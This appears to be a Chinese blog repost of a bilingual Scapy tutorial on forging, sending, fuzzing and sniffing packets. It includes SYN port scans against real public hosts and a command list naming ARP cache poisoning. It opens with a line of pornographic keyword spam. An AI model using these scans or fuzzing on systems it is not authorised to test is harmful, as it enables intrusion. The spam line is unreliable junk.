久久精品国产精品国产精品污,男人扒开添女人下部免费视频,一级国产69式性姿势免费视频,夜鲁夜鲁很鲁在线视频 视频,欧美丰满少妇一区二区三区,国产偷国产偷亚洲高清人乐享,中文 在线 日韩 亚洲 欧美,熟妇人妻无乱码中文字幕真矢织江,一区二区三区人妻制服国产

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

交互式数据包处理程序 Scapy 用法

發(fā)布時間:2024/7/23 编程问答 33 豆豆
生活随笔 收集整理的這篇文章主要介紹了 交互式数据包处理程序 Scapy 用法 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

From:https://www.cnblogs.com/hongxueyong/p/5641475.html

Scapy 用法官方文檔:http://scapy.readthedocs.io/en/latest/#starting-scapy


About Scapy

Scapy is a Python program that enables the user to send, sniff and dissect and forge network packets. This capability allows construction of tools that can probe, scan or attack networks.

In other words, Scapy is a powerful interactive packet manipulation program. It is able to forge or decode packets of a wide number of protocols, send them on the wire, capture them, match requests and replies, and much more. Scapy can easily handle most classical tasks like scanning, tracerouting, probing, unit tests, attacks or network discovery. It can replace hping, arpspoof, arp-sk, arping, p0f and even some parts of Nmap, tcpdump, and tshark).

Scapy是Python程序,使用戶能夠發(fā)送、嗅探、剖析和偽造網(wǎng)絡(luò)數(shù)據(jù)包。這種能力允許構(gòu)建能夠探測、掃描或攻擊網(wǎng)絡(luò)的工具。

換句話說,Scapy是一個強大的交互式數(shù)據(jù)包處理程序。它能夠偽造或解碼大量協(xié)議的數(shù)據(jù)包,將它們發(fā)送到網(wǎng)絡(luò)上,捕獲它們,匹配請求和應(yīng)答,甚至更多。Scapy能夠輕松處理大多數(shù)經(jīng)典的任務(wù),比如掃描、跟蹤、探測、單元測試、攻擊或網(wǎng)絡(luò)發(fā)現(xiàn)。 它可以替代hping、arpspoof、arp-sk、arping、p0f 甚至 Nmap、tcpdump和tshark的一些部分 )。



開始學(xué)習(xí)Scapy


Scapy’s interactive shell is run in a terminal session. Root privileges are needed to send the packets, so we’re using?sudo?here:

在終端界面運行Scapy的交互式shell,并且發(fā)送數(shù)據(jù)包需要root權(quán)限:

$ sudo scapy
Welcome to Scapy (2.0.1-dev)
>>>

On Windows, please open a command prompt (cmd.exe) and make sure that you have administrator privileges:

在Windows以管理員權(quán)限運行一個cmd界面:

C:\>scapy
INFO: No IPv6 support in kernel
WARNING: No route found for IPv6 destination :: (no default route?)
Welcome to Scapy (2.0.1-dev)
>>>

If you do not have all optional packages installed, Scapy will inform you that some features will not be available:

如果你沒有安裝所有可選的包,Scapy 將會提示一些功能不能使用

INFO: Can't import python gnuplot wrapper . Won't be able to plot.
INFO: Can't import PyX. Won't be able to use psdump() or pdfdump().

The basic features of sending and receiving packets should still work, though.

發(fā)送和接收數(shù)據(jù)包的基本功能應(yīng)該可以工作了

?

Interactive tutorial

交互式用法

This section will show you several of Scapy’s features. Just open a Scapy session as shown above and try the examples yourself.

本節(jié)將向您展示Scapy的一些功能。打開一個Scapy會話如上所示并嘗試自己的例子。

第一步

Let’s build a packet and play with it:

讓我們構(gòu)造一個數(shù)據(jù)包和顯示數(shù)據(jù)包

>>> a=IP(ttl=10)
>>> a
< IP ttl=10 |>
>>> a.src
’127.0.0.1’
>>> a.dst="192.168.1.1"
>>> a
< IP ttl=10 dst=192.168.1.1 |>
>>> a.src
’192.168.8.14’
>>> del(a.ttl)
>>> a
< IP dst=192.168.1.1 |>
>>> a.ttl
64

?

數(shù)據(jù)包分層

The?/?operator has been used as a composition operator between two layers. When doing so, the lower layer can have one or more of its defaults fields overloaded according to the upper layer. (You still can give the value you want). A string can be used as a raw layer.

/進行數(shù)據(jù)包兩層之間的合并,并且你可以自定義數(shù)據(jù)包的各個字段,如果不填寫,會使用默認的字段

>>> IP()
<IP |>
>>> IP()/TCP()
<IP frag=0 proto=TCP |<TCP |>>
>>> Ether()/IP()/TCP()
<Ether type=0x800 |<IP frag=0 proto=TCP |<TCP |>>>
>>> IP()/TCP()/"GET / HTTP/1.0\r\n\r\n"
<IP frag=0 proto=TCP |<TCP |<Raw load='GET / HTTP/1.0\r\n\r\n' |>>>
>>> Ether()/IP()/IP()/UDP()
<Ether type=0x800 |<IP frag=0 proto=IP |<IP frag=0 proto=UDP |<UDP |>>>>
>>> IP(proto=55)/TCP()
<IP frag=0 proto=55 |<TCP |>>

Each packet can be build or dissected (note: in Python?_?(underscore) is the latest result):

每一個數(shù)據(jù)包都可以構(gòu)造或切分(注意:Python _(下劃線)最后的結(jié)果):

>>> str(IP())
'E\x00\x00\x14\x00\x01\x00\x00@\x00|\xe7\x7f\x00\x00\x01\x7f\x00\x00\x01'
>>> IP(_)
<IP version=4L ihl=5L tos=0x0 len=20 id=1 flags= frag=0L ttl=64 proto=IP
?chksum=0x7ce7 src=127.0.0.1 dst=127.0.0.1 |>
>>> ?a=Ether()/IP(dst="www.slashdot.org")/TCP()/"GET /index.html HTTP/1.0 \n\n"
>>> ?hexdump(a)
00 02 15 37 A2 44 00 AE F3 52 AA D1 08 00 45 00? ...7.D...R....E.
00 43 00 01 00 00 40 06 78 3C C0 A8 05 15 42 23? .C....@.x<....B#
FA 97 00 14 00 50 00 00 00 00 00 00 00 00 50 02? .....P........P.
20 00 BB 39 00 00 47 45 54 20 2F 69 6E 64 65 78?? ..9..GET /index
2E 68 74 6D 6C 20 48 54 54 50 2F 31 2E 30 20 0A? .html HTTP/1.0 .
0A?????????????????????????????????????????????? .
>>> b=str(a)
>>> b
'\x00\x02\x157\xa2D\x00\xae\xf3R\xaa\xd1\x08\x00E\x00\x00C\x00\x01\x00\x00@\x06x<\xc0
?\xa8\x05\x15B#\xfa\x97\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00
?\xbb9\x00\x00GET /index.html HTTP/1.0 \n\n'
>>> c=Ether(b)
>>> c
<Ether dst=00:02:15:37:a2:44 src=00:ae:f3:52:aa:d1 type=0x800 |<IP version=4L
?ihl=5L tos=0x0 len=67 id=1 flags= frag=0L ttl=64 proto=TCP chksum=0x783c
?src=192.168.5.21 dst=66.35.250.151 options='' |<TCP sport=20 dport=80 seq=0L
?ack=0L dataofs=5L reserved=0L flags=S window=8192 chksum=0xbb39 urgptr=0
?options=[] |<Raw load='GET /index.html HTTP/1.0 \n\n' |>>>>

?We see that a dissected packet has all its fields filled. That’s because I consider that each field has its value imposed by the original string. If this is too verbose, the method hide_defaults() will delete every field that has the same value as the default:

>>> c.hide_defaults()
>>> c
<Ether dst=00:0f:66:56:fa:d2 src=00:ae:f3:52:aa:d1 type=0x800 |<IP ihl=5L len=67
?frag=0 proto=TCP chksum=0x783c src=192.168.5.21 dst=66.35.250.151 |<TCP dataofs=5L
?chksum=0xbb39 options=[] |<Raw load='GET /index.html HTTP/1.0 \n\n' |>>>>

讀取 PCAP 文件

You can read packets from a pcap file and write them to a pcap file.

你可以從pcap讀取數(shù)據(jù)包文件,并把它們到一個pcap文件

?>>> a=rdpcap("/spare/captures/isakmp.cap")

>>> a
<isakmp.cap: UDP:721 TCP:0 ICMP:0 Other:0>

圖形化展示(PDF, PS)

If you have PyX installed, you can make a graphical PostScript/PDF dump of a packet or a list of packets (see the ugly PNG image below. PostScript/PDF are far better quality...):

如果你已經(jīng)安裝了PyX?,你能夠用圖像化PostScript/PDF展示數(shù)據(jù)包(如下png圖片展示. PostScript/PDF展示的更好):

?>>> a[423].pdfdump(layer_shift=1)

>>> a[423].psdump("/tmp/isakmp_pkt.eps",layer_shift=1)

Command

Effect

str(pkt)

assemble the packet

hexdump(pkt)

have an hexadecimal dump

ls(pkt)

have the list of fields values

pkt.summary()

for a one-line summary

pkt.show()

for a developped view of the packet

pkt.show2()

same as show but on the assembled packet (checksum is calculated, for instance)

pkt.sprintf()

fills a format string with fields values of the packet

pkt.decode_payload_as()

changes the way the payload is decoded

pkt.psdump()

draws a PostScript diagram with explained dissection

pkt.pdfdump()

draws a PDF with explained dissection

pkt.command()

return a Scapy command that can generate the packet

Generating sets of packets

生成數(shù)據(jù)包集

For the moment, we have only generated one packet.

目前,我們僅僅是構(gòu)造了一個數(shù)據(jù)包,下面我們可以怎么樣很容易的生成一個數(shù)據(jù)包集,整個數(shù)據(jù)包的每個字段我們都可以自己定義,

This implicidely define a set of packets, generated using a kind of cartesian product between all the fields.

每個定義的數(shù)據(jù)包Scapy可以在每個字段中間生成一個笛卡爾集合

>>> a=IP(dst="www.slashdot.org/30")
>>> a
<IP? dst=Net('www.slashdot.org/30') |>
>>> [p for p in a]
[<IP dst=66.35.250.148 |>, <IP dst=66.35.250.149 |>,
?<IP dst=66.35.250.150 |>, <IP dst=66.35.250.151 |>]
>>> b=IP(ttl=[1,2,(5,9)])
>>> b
<IP ttl=[1, 2, (5, 9)] |>
>>> [p for p in b]
[<IP ttl=1 |>, <IP ttl=2 |>, <IP ttl=5 |>, <IP ttl=6 |>,
?<IP ttl=7 |>, <IP ttl=8 |>, <IP ttl=9 |>]
>>> c=TCP(dport=[80,443])
>>> [p for p in a/c]
[<IP frag=0 proto=TCP dst=66.35.250.148 |<TCP dport=80 |>>,
?<IP frag=0 proto=TCP dst=66.35.250.148 |<TCP dport=443 |>>,
?<IP frag=0 proto=TCP dst=66.35.250.149 |<TCP dport=80 |>>,
?<IP frag=0 proto=TCP dst=66.35.250.149 |<TCP dport=443 |>>,
?<IP frag=0 proto=TCP dst=66.35.250.150 |<TCP dport=80 |>>,
?<IP frag=0 proto=TCP dst=66.35.250.150 |<TCP dport=443 |>>,
?<IP frag=0 proto=TCP dst=66.35.250.151 |<TCP dport=80 |>>,
?<IP frag=0 proto=TCP dst=66.35.250.151 |<TCP dport=443 |>>]

Some operations (like building the string from a packet) can’t work on a set of packets. In these cases, if you forgot to unroll your set of packets, only the first element of the list you forgot to generate will be used to assemble the packet.

Command

Effect

summary()

displays a list of summaries of each packet

nsummary()

same as previous, with the packet number

conversations()

displays a graph of conversations

show()

displays the prefered representation (usually nsummary())

filter()

returns a packet list filtered with a lambda function

hexdump()

returns a hexdump of all packets

hexraw()

returns a hexdump of the Raw layer of all packets

padding()

returns a hexdump of packets with padding

nzpadding()

returns a hexdump of packets with non-zero padding

plot()

plots a lambda function applied to the packet list

make table()

displays a table according to a lambda function

Sending packets

發(fā)送數(shù)據(jù)包

Now that we know how to manipulate packets. Let’s see how to send them. The send() function will send packets at layer 3. That is to say it will handle routing and layer 2 for you. The sendp() function will work at layer 2. It’s up to you to choose the right interface and the right link layer protocol.

現(xiàn)在你知道怎么樣構(gòu)造數(shù)據(jù)包了,下面介紹怎么樣發(fā)送數(shù)據(jù)包。用send()方法能夠發(fā)送3層數(shù)據(jù)包,用sendp()將處理二層數(shù)據(jù)包,有你選擇正確的接口和正確的鏈路層協(xié)議

>>> send(IP(dst="1.2.3.4")/ICMP())
.
Sent 1 packets.
>>> sendp(Ether()/IP(dst="1.2.3.4",ttl=(1,4)), iface="eth1")
....
Sent 4 packets.
>>> sendp("I'm travelling on Ethernet", iface="eth1", loop=1, inter=0.2)
................^C
Sent 16 packets.
>>> sendp(rdpcap("/tmp/pcapfile")) # tcpreplay
...........
Sent 11 packets.

Fuzzing

The function fuzz() is able to change any default value that is not to be calculated (like checksums) by an object whose value is random and whose type is adapted to the field. This enables to quicky built fuzzing templates and send them in loop. In the following example, the IP layer is normal, and the UDP and NTP layers are fuzzed. The UDP checksum will be correct, the UDP destination port will be overloaded by NTP to be 123 and the NTP version will be forced to be 4. All the other ports will be randomized:

“fuzz()”函數(shù)可以通過一個具有隨機值、數(shù)據(jù)類型合適的對象,來改變?nèi)魏文J值,但該值是不能被計算的(像校驗和那樣)。這使得可以快速建立循環(huán)模糊化測試模板。在下面的例子中,IP層是正常的,UDP層和NTP層被fuzz。UDP的校驗和是正確的,UDP的目的端口被NTP重載為123,而且NTP的版本被更變?yōu)?.其他所有的端口將被隨機分組:

>>> send(IP(dst="target")/fuzz(UDP()/NTP(version=4)),loop=1)
................^C
Sent 16 packets.

Send and receive packets (sr)

發(fā)送和接收數(shù)據(jù)包(“sr”)

Now, let’s try to do some fun things. The sr() function is for sending packets and receiving answers. The function returns a couple of packet and answers, and the unanswered packets. The function sr1() is a variant that only return one packet that answered the packet (or the packet set) sent. The packets must be layer 3 packets (IP, ARP, etc.). The function srp() do the same for layer 2 packets (Ethernet, 802.3, etc.).

現(xiàn)在讓我們做一些有趣的事情。“sr()”函數(shù)是用來發(fā)送數(shù)據(jù)包和接收應(yīng)答。該函數(shù)返回一對數(shù)據(jù)包及其應(yīng)答,還有無應(yīng)答的數(shù)據(jù)包。“sr1()”函數(shù)是一種變體,用來返回一個應(yīng)答數(shù)據(jù)包。發(fā)送的數(shù)據(jù)包必須是第3層報文(IP,ARP等)。“srp()”則是使用第2層報文(以太網(wǎng),802.3等)。

>>> p=sr1(IP(dst="www.slashdot.org")/ICMP()/"XXXXXXXXXXX")
Begin emission:
...Finished to send 1 packets.
.*
Received 5 packets, got 1 answers, remaining 0 packets
>>> p
<IP version=4L ihl=5L tos=0x0 len=39 id=15489 flags= frag=0L ttl=42 proto=ICMP
?chksum=0x51dd src=66.35.250.151 dst=192.168.5.21 options='' |<ICMP type=echo-reply
?code=0 chksum=0xee45 id=0x0 seq=0x0 |<Raw load='XXXXXXXXXXX'
?|<Padding load='\x00\x00\x00\x00' |>>>>
>>> p.show()
---[ IP ]---
version?? = 4L
ihl?????? = 5L
tos?????? = 0x0
len?????? = 39
id??????? = 15489
flags???? =
frag????? = 0L
ttl?????? = 42
proto???? = ICMP
chksum??? = 0x51dd
src?????? = 66.35.250.151
dst?????? = 192.168.5.21
options?? = ''
---[ ICMP ]---
?? type????? = echo-reply
?? code????? = 0
?? chksum??? = 0xee45
?? id??????? = 0x0
?? seq?????? = 0x0
---[ Raw ]---
????? load????? = 'XXXXXXXXXXX'
---[ Padding ]---
???????? load????? = '\x00\x00\x00\x00'

A DNS query (rd?= recursion desired). The host 192.168.5.1 is my DNS server. Note the non-null padding coming from my Linksys having the Etherleak flaw:

DNS查詢(“rd” = recursion desired)。主機192.168.5.1是我的DNS服務(wù)器。注意從我Linksys來的非空填充具有Etherleak缺陷:

>>> sr1(IP(dst="192.168.5.1")/UDP()/DNS(rd=1,qd=DNSQR(qname="www.slashdot.org")))
Begin emission:
Finished to send 1 packets.
..*
Received 3 packets, got 1 answers, remaining 0 packets
<IP version=4L ihl=5L tos=0x0 len=78 id=0 flags=DF frag=0L ttl=64 proto=UDP chksum=0xaf38
?src=192.168.5.1 dst=192.168.5.21 options='' |<UDP sport=53 dport=53 len=58 chksum=0xd55d
?|<DNS id=0 qr=1L opcode=QUERY aa=0L tc=0L rd=1L ra=1L z=0L rcode=ok qdcount=1 ancount=1
?nscount=0 arcount=0 qd=<DNSQR qname='www.slashdot.org.' qtype=A qclass=IN |>
?an=<DNSRR rrname='www.slashdot.org.' type=A rclass=IN ttl=3560L rdata='66.35.250.151' |>
?ns=0 ar=0 |<Padding load='\xc6\x94\xc7\xeb' |>>>>

The “send’n’receive” functions family is the heart of scapy. They return a couple of two lists. The first element is a list of couples (packet sent, answer), and the second element is the list of unanswered packets. These two elements are lists, but they are wrapped by an object to present them better, and to provide them with some methods that do most frequently needed actions:

發(fā)送和接收函數(shù)族是scapy中的核心部分。它們返回一對兩個列表。第一個就是發(fā)送的數(shù)據(jù)包及其應(yīng)答組成的列表,第二個是無應(yīng)答數(shù)據(jù)包組成的列表。為了更好地呈現(xiàn)它們,它們被封裝成一個對象,并且提供了一些便于操作的方法:

>>> sr(IP(dst="192.168.8.1")/TCP(dport=[21,22,23]))
Received 6 packets, got 3 answers, remaining 0 packets
(<Results: UDP:0 TCP:3 ICMP:0 Other:0>, <Unanswered: UDP:0 TCP:0 ICMP:0 Other:0>)
>>> ans,unans=_
>>> ans.summary()
IP / TCP 192.168.8.14:20 > 192.168.8.1:21 S ==> Ether / IP / TCP 192.168.8.1:21 > 192.168.8.14:20 RA / Padding
IP / TCP 192.168.8.14:20 > 192.168.8.1:22 S ==> Ether / IP / TCP 192.168.8.1:22 > 192.168.8.14:20 RA / Padding
IP / TCP 192.168.8.14:20 > 192.168.8.1:23 S ==> Ether / IP / TCP 192.168.8.1:23 > 192.168.8.14:20 RA / Padding

If there is a limited rate of answers, you can specify a time interval to wait between two packets with the inter parameter. If some packets are lost or if specifying an interval is not enough, you can resend all the unanswered packets, either by calling the function again, directly with the unanswered list, or by specifying a retry parameter. If retry is 3, scapy will try to resend unanswered packets 3 times. If retry is -3, scapy will resend unanswered packets until no more answer is given for the same set of unanswered packets 3 times in a row. The timeout parameter specify the time to wait after the last packet has been sent:

如果對于應(yīng)答數(shù)據(jù)包有速度限制,你可以通過“inter”參數(shù)來設(shè)置兩個數(shù)據(jù)包之間等待的時間間隔。如果有些數(shù)據(jù)包丟失了,或者設(shè)置時間間隔不足以滿足要求,你可以重新發(fā)送所有無應(yīng)答數(shù)據(jù)包。你可以簡單地對無應(yīng)答數(shù)據(jù)包列表再調(diào)用一遍函數(shù),或者去設(shè)置“retry”參數(shù)。如果retry設(shè)置為3,scapy會對無應(yīng)答的數(shù)據(jù)包重復(fù)發(fā)送三次。如果retry設(shè)為-3,scapy則會一直發(fā)送無應(yīng)答的數(shù)據(jù)包,直到“timeout”參數(shù)等待最后一個數(shù)據(jù)包已發(fā)送的時間。

>>> sr(IP(dst="172.20.29.5/30")/TCP(dport=[21,22,23]),inter=0.5,retry=-2,timeout=1)
Begin emission:
Finished to send 12 packets.
Begin emission:
Finished to send 9 packets.
Begin emission:
Finished to send 9 packets.

Received 100 packets, got 3 answers, remaining 9 packets
(<Results: UDP:0 TCP:3 ICMP:0 Other:0>, <Unanswered: UDP:0 TCP:9 ICMP:0 Other:0>)

SYN Scans

Classic SYN Scan can be initialized by executing the following command from Scapy’s prompt:

在Scapy提示符中執(zhí)行以下命令,可以對經(jīng)典的SYN Scan初始化:

>>> sr1(IP(dst="72.14.207.99")/TCP(dport=80,flags="S"))

The above will send a single SYN packet to Google’s port 80 and will quit after receving a single response:

以上向Google的80端口發(fā)送了一個SYN數(shù)據(jù)包,會在接收到一個應(yīng)答后退出:

Begin emission:
.Finished to send 1 packets.
*
Received 2 packets, got 1 answers, remaining 0 packets
<IP? version=4L ihl=5L tos=0x20 len=44 id=33529 flags= frag=0L ttl=244
proto=TCP chksum=0x6a34 src=72.14.207.99 dst=192.168.1.100 options=// |
<TCP? sport=www dport=ftp-data seq=2487238601L ack=1 dataofs=6L reserved=0L
flags=SA window=8190 chksum=0xcdc7 urgptr=0 options=[('MSS', 536)] |
<Padding? load='V\xf7' |>>>

From the above output, we can see Google returned “SA” or SYN-ACK flags indicating an open port.

Use either notations to scan ports 400 through 443 on the system:

從以上的輸出中可以看出,Google返回了一個SA(SYN-ACK)標志位,表示80端口是開放的。

使用其他標志位掃描一下系統(tǒng)的440到443端口:

>>> sr(IP(dst="192.168.1.1")/TCP(sport=666,dport=(440,443),flags="S"))

or

>>> sr(IP(dst="192.168.1.1")/TCP(sport=RandShort(),dport=[440,441,442,443],flags="S"))

In order to quickly review responses simply request a summary of collected packets:

可以對收集的數(shù)據(jù)包進行摘要(summary),來快速地瀏覽響應(yīng):

>>> ans,unans = _
>>> ans.summary()
IP / TCP 192.168.1.100:ftp-data > 192.168.1.1:440 S ======> IP / TCP 192.168.1.1:440 > 192.168.1.100:ftp-data RA / Padding
IP / TCP 192.168.1.100:ftp-data > 192.168.1.1:441 S ======> IP / TCP 192.168.1.1:441 > 192.168.1.100:ftp-data RA / Padding
IP / TCP 192.168.1.100:ftp-data > 192.168.1.1:442 S ======> IP / TCP 192.168.1.1:442 > 192.168.1.100:ftp-data RA / Padding
IP / TCP 192.168.1.100:ftp-data > 192.168.1.1:https S ======> IP / TCP 192.168.1.1:https > 192.168.1.100:ftp-data SA / Padding

The above will display stimulus/response pairs for answered probes. We can display only the information we are interested in by using a simple loop:

以上顯示了我們在掃描過程中的請求應(yīng)答對。我們也可以用一個循環(huán)來只顯示我們感興趣的信息:

>>> ans.summary( lambda(s,r): r.sprintf("%TCP.sport% \t %TCP.flags%") )
440????? RA
441????? RA
442????? RA
https??? SA

Even better, a table can be built using the?make_table()?function to display information about multiple targets:

可以使用“make_table()”函數(shù)建立一個表格,更好地顯示多個目標信息:

>>> ans,unans = sr(IP(dst=["192.168.1.1","yahoo.com","slashdot.org"])/TCP(dport=[22,80,443],flags="S"))
Begin emission:
.......*.**.......Finished to send 9 packets.
**.*.*..*..................
Received 362 packets, got 8 answers, remaining 1 packets
>>> ans.make_table(
... ???lambda(s,r): (s.dst, s.dport,
... ???r.sprintf("{TCP:%TCP.flags%}{ICMP:%IP.src% - %ICMP.type%}")))
??? 66.35.250.150??????????????? 192.168.1.1 216.109.112.135
22? 66.35.250.150 - dest-unreach RA????????? -
80? SA?????????????????????????? RA????????? SA
443 SA?????????????????????????? SA????????? SA

The above example will even print the ICMP error type if the ICMP packet was received as a response instead of expected TCP.

在以上的例子中,如果接收到作為響應(yīng)的ICMP數(shù)據(jù)包而不是預(yù)期的TCP數(shù)據(jù)包,就會打印出ICMP差錯類型(error type)。

?

For larger scans, we could be interested in displaying only certain responses. The example below will only display packets with the “SA” flag set:

對于更大型的掃描,我們可能對某個響應(yīng)感興趣,下面的例子就只顯示設(shè)置了“SA”標志位的數(shù)據(jù)包:

>>> ans.nsummary(lfilter = lambda (s,r): r.sprintf("%TCP.flags%") == "SA")
0003 IP / TCP 192.168.1.100:ftp_data > 192.168.1.1:https S ======> IP / TCP 192.168.1.1:https > 192.168.1.100:ftp_data SA

In case we want to do some expert analysis of responses, we can use the following command to indicate which ports are open:

如果我們想對響應(yīng)進行專業(yè)分析,我們可以使用以下的命令顯示哪些端口是開放的:

>>> ans.summary(lfilter = lambda (s,r): r.sprintf("%TCP.flags%") == "SA",prn=lambda(s,r):r.sprintf("%TCP.sport% is open"))
https is open

Again, for larger scans we can build a table of open ports:

對于更大型的掃描,我們可以建立一個端口開放表:

>>> ans.filter(lambda (s,r):TCP in r and r[TCP].flags&2).make_table(lambda (s,r):
... ????????????(s.dst, s.dport, "X"))
??? 66.35.250.150 192.168.1.1 216.109.112.135
80? X???????????? -?????????? X
443 X???????????? X?????????? X

If all of the above methods were not enough, Scapy includes a report_ports() function which not only automates the SYN scan, but also produces a LaTeX output with collected results:

如果以上的方法還不夠,Scapy還包含一個“report_ports()”函數(shù),該函數(shù)不僅可以自動化SYN scan,而且還會對收集的結(jié)果以LaTeX形式輸出:

>>> report_ports("192.168.1.1",(440,443))
Begin emission:
...*.**Finished to send 4 packets.
*
Received 8 packets, got 4 answers, remaining 0 packets
'\\begin{tabular}{|r|l|l|}\n\\hline\nhttps?& open & SA \\\\\n\\hline\n440
?& closed & TCP RA \\\\\n441 & closed & TCP RA \\\\\n442 & closed &
TCP RA \\\\\n\\hline\n\\hline\n\\end{tabular}\n'

TCP traceroute

A TCP traceroute:

TCP路由追蹤:

>>> ans,unans=sr(IP(dst=target, ttl=(4,25),id=RandShort())/TCP(flags=0x2))
*****.******.*.***..*.**Finished to send 22 packets.
***......
Received 33 packets, got 21 answers, remaining 1 packets
>>> for snd,rcv in ans:
... ????print snd.ttl, rcv.src, isinstance(rcv.payload, TCP)
...
5 194.51.159.65 0
6 194.51.159.49 0
4 194.250.107.181 0
7 193.251.126.34 0
8 193.251.126.154 0
9 193.251.241.89 0
10 193.251.241.110 0
11 193.251.241.173 0
13 208.172.251.165 0
12 193.251.241.173 0
14 208.172.251.165 0
15 206.24.226.99 0
16 206.24.238.34 0
17 173.109.66.90 0
18 173.109.88.218 0
19 173.29.39.101 1
20 173.29.39.101 1
21 173.29.39.101 1
22 173.29.39.101 1
23 173.29.39.101 1
24 173.29.39.101 1

Note that the TCP traceroute and some other high-level functions are already coded:

注意:TCP路由跟蹤和其他高級函數(shù)早已被構(gòu)造好了:

>>> lsc()
sr?????????????? : Send and receive packets at layer 3
sr1????????????? : Send packets at layer 3 and return only the first answer
srp????????????? : Send and receive packets at layer 2
srp1???????????? : Send and receive packets at layer 2 and return only the first answer
srloop?????????? : Send a packet at layer 3 in loop and print the answer each time
srploop????????? : Send a packet at layer 2 in loop and print the answer each time
sniff??????????? : Sniff packets
p0f????????????? : Passive OS fingerprinting: which OS emitted this TCP SYN ?
arpcachepoison?? : Poison target's cache with (your MAC,victim's IP) couple
send???????????? : Send packets at layer 3
sendp??????????? : Send packets at layer 2
traceroute?????? : Instant TCP traceroute
arping?????????? : Send ARP who-has requests to determine which hosts are up
ls?????????????? : List? available layers, or infos on a given layer
lsc????????????? : List user commands
queso??????????? : Queso OS fingerprinting
nmap_fp????????? : nmap fingerprinting
report_ports???? : portscan a target and output a LaTeX table
dyndns_add?????? : Send a DNS add message to a nameserver for "name" to have a new "rdata"
dyndns_del?????? : Send a DNS delete message to a nameserver for "name"
[...]

Configuring super sockets

配置高級sockets

The process of sending packets and receiving is quite complicated. As I wanted to use the PF_PACKET interface to go through netfilter, I also needed to implement an ARP stack and ARP cache, and a LL stack. Well it seems to work, on ethernet and PPP interfaces, but I don’t guarantee anything. Anyway, the fact I used a kind of super-socket for that mean that you can switch your IO layer very easily, and use PF_INET/SOCK_RAW, or use PF_PACKET at level 2 (giving the LL header (ethernet,...) and giving yourself mac addresses, ...). I’ve just added a super socket which use libdnet and libpcap, so that it should be portable:

發(fā)送和接收數(shù)據(jù)包的過程是相當復(fù)雜的。我想用PF_PACKET接口來通過netfilter,我也需要實現(xiàn)一個ARP堆棧、ARP緩存和一個堆棧。在以太網(wǎng)和ppp接口上看來可以工作,但我不保證任何事情。不管怎樣,事實上我使用一種super-socket,這意味著你可以很容易的切換IO層,并使用PF_INET / SOCK_RAW,或者使用PF_PACKET的級別2(得到LL頭(以太網(wǎng),…)和自己的mac地址,…)。我剛剛添加了一個使用libdnet和libpcap,的super socket,所以它應(yīng)該可以移植:

>>> conf.L3socket=L3dnetSocket
>>> conf.L3listen=L3pcapListenSocket

Sniffing

We can easily capture some packets or even clone tcpdump or tethereal. If no interface is given, sniffing will happen on every interfaces:

我們可以簡單地捕獲數(shù)據(jù)包,或者是克隆tcpdump或tethereal的功能。如果沒有指定接口,則會 在所有的接口上進行嗅探:

>>> ?sniff(filter="icmp and host 66.35.250.151", count=2)
<Sniffed: UDP:0 TCP:0 ICMP:2 Other:0>
>>> ?a=_
>>> ?a.nsummary()
0000 Ether / IP / ICMP 192.168.5.21 echo-request 0 / Raw
0001 Ether / IP / ICMP 192.168.5.21 echo-request 0 / Raw
>>> ?a[1]
<Ether dst=00:ae:f3:52:aa:d1 src=00:02:15:37:a2:44 type=0x800 |<IP version=4L
?ihl=5L tos=0x0 len=84 id=0 flags=DF frag=0L ttl=64 proto=ICMP chksum=0x3831
?src=192.168.5.21 dst=66.35.250.151 options='' |<ICMP type=echo-request code=0
?chksum=0x6571 id=0x8745 seq=0x0 |<Raw load='B\xf7g\xda\x00\x07um\x08\t\n\x0b
?\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d
?\x1e\x1f !\x22#$%&\'()*+,-./01234567' |>>>>
>>> sniff(iface="wifi0", prn=lambda x: x.summary())
802.11 Management 8 ff:ff:ff:ff:ff:ff / 802.11 Beacon / Info SSID / Info Rates / Info DSset / Info TIM / Info 133
802.11 Management 4 ff:ff:ff:ff:ff:ff / 802.11 Probe Request / Info SSID / Info Rates
802.11 Management 5 00:0a:41:ee:a5:50 / 802.11 Probe Response / Info SSID / Info Rates / Info DSset / Info 133
802.11 Management 4 ff:ff:ff:ff:ff:ff / 802.11 Probe Request / Info SSID / Info Rates
802.11 Management 4 ff:ff:ff:ff:ff:ff / 802.11 Probe Request / Info SSID / Info Rates
802.11 Management 8 ff:ff:ff:ff:ff:ff / 802.11 Beacon / Info SSID / Info Rates / Info DSset / Info TIM / Info 133
802.11 Management 11 00:07:50:d6:44:3f / 802.11 Authentication
802.11 Management 11 00:0a:41:ee:a5:50 / 802.11 Authentication
802.11 Management 0 00:07:50:d6:44:3f / 802.11 Association Request / Info SSID / Info Rates / Info 133 / Info 149
802.11 Management 1 00:0a:41:ee:a5:50 / 802.11 Association Response / Info Rates / Info 133 / Info 149
802.11 Management 8 ff:ff:ff:ff:ff:ff / 802.11 Beacon / Info SSID / Info Rates / Info DSset / Info TIM / Info 133
802.11 Management 8 ff:ff:ff:ff:ff:ff / 802.11 Beacon / Info SSID / Info Rates / Info DSset / Info TIM / Info 133
802.11 / LLC / SNAP / ARP who has 172.20.70.172 says 172.20.70.171 / Padding
802.11 / LLC / SNAP / ARP is at 00:0a:b7:4b:9c:dd says 172.20.70.172 / Padding
802.11 / LLC / SNAP / IP / ICMP echo-request 0 / Raw
802.11 / LLC / SNAP / IP / ICMP echo-reply 0 / Raw
>>> sniff(iface="eth1", prn=lambda x: x.show())
---[ Ethernet ]---
dst?????? = 00:ae:f3:52:aa:d1
src?????? = 00:02:15:37:a2:44
type????? = 0x800
---[ IP ]---
?? version?? = 4L
?? ihl?????? = 5L
?? tos?????? = 0x0
?? len?????? = 84
?? id??????? = 0
?? flags???? = DF
?? frag????? = 0L
?? ttl?????? = 64
?? proto???? = ICMP
?? chksum??? = 0x3831
?? src?????? = 192.168.5.21
?? dst?????? = 66.35.250.151
?? options?? = ''
---[ ICMP ]---
????? type????? = echo-request
????? code????? = 0
????? chksum??? = 0x89d9
????? id??????? = 0xc245
????? seq?????? = 0x0
---[ Raw ]---
